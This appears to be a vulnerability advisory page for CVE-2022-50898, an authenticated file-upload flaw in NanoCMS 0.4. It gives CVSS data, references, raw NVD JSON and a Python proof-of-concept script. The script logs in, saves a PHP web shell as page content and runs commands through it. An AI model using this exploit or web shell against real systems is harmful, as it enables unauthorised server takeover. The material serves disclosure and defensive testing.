CVE-2022-50898

Description

NanoCMS 0.4 contains an authenticated file upload vulnerability that allows remote code execution through unvalidated page content creation. Authenticated attackers can upload PHP files with arbitrary code to the server's pages directory by exploiting the page creation mechanism without proper input sanitization.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kalyan02:nanocms:0.4:*:*:*:*:*:*:* - VULNERABLE

NanoCMS 0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2022-50898 NanoCMS 0.4 Authenticated RCE PoC
# Target: NanoCMS 0.4
# Vulnerability: Authenticated file upload leading to RCE

def exploit(target_url, username, password, command):
    """
    Exploit NanoCMS 0.4 authenticated file upload vulnerability
    :param target_url: Base URL of the target NanoCMS installation
    :param username: Valid username for authentication
    :param password: Password for the user
    :param command: System command to execute on the target
    """
    session = requests.Session()
    
    # Step 1: Login to get authenticated session
    login_url = f"{target_url}/index.php"
    login_data = {
        'user': username,
        'pass': password,
        'submit': 'Login'
    }
    
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        
        # Step 2: Create a page with malicious PHP code
        page_url = f"{target_url}/?action=edit_page"
        webshell_content = f"<?php system($_GET['cmd']); ?>"
        page_data = {
            'title': 'pwned',
            'content': webshell_content,
            'submit': 'Save'
        }
        
        response = session.post(page_url, data=page_data, timeout=10)
        
        # Step 3: Extract the created page slug from response
        # In real exploitation, attacker would need to identify the page filename
        # Typically it's stored in pages/ directory
        
        # Step 4: Execute command via webshell
        shell_url = f"{target_url}/data/pages/pwned.php"
        exec_params = {'cmd': command}
        
        response = session.get(shell_url, params=exec_params, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Command executed successfully!")
            print(f"Output: {response.text}")
        else:
            print(f"[-] Exploitation failed. Status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <command>")
        print(f"Example: {sys.argv[0]} http://target.com admin admin123 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4]
    
    exploit(target, user, pwd, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50898
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50898
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50898/
[4] VulDB https://vuldb.com/cve/CVE-2022-50898
[5] https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt
[6] https://github.com/kalyan02/NanoCMS
[7] https://www.exploit-db.com/exploits/50997
[8] https://www.vulncheck.com/advisories/nanocms-remote-code-execution-rce-authenticated
[9] https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50898", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:51.833", "lastModified": "2026-01-29T14:16:11.793", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoCMS 0.4 contains an authenticated file upload vulnerability that allows remote code execution through unvalidated page content creation. Authenticated attackers can upload PHP files with arbitrary code to the server's pages directory by exploiting the page creation mechanism without proper input sanitization."}, {"lang": "es", "value": "NanoCMS 0.4 contiene una vulnerabilidad de carga de archivos autenticada que permite la ejecución remota de código a través de la creación de contenido de página no validado. Atacantes autenticados pueden subir archivos PHP con código arbitrario al directorio de páginas del servidor explotando el mecanismo de creación de páginas sin una sanitización de entrada adecuada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kalyan02:nanocms:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "BF61FF4D-D98D-41FD-8DB6-222EDE01B34E"}]}]}], "references": [{"url": "https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/kalyan02/NanoCMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50997", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/nanocms-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}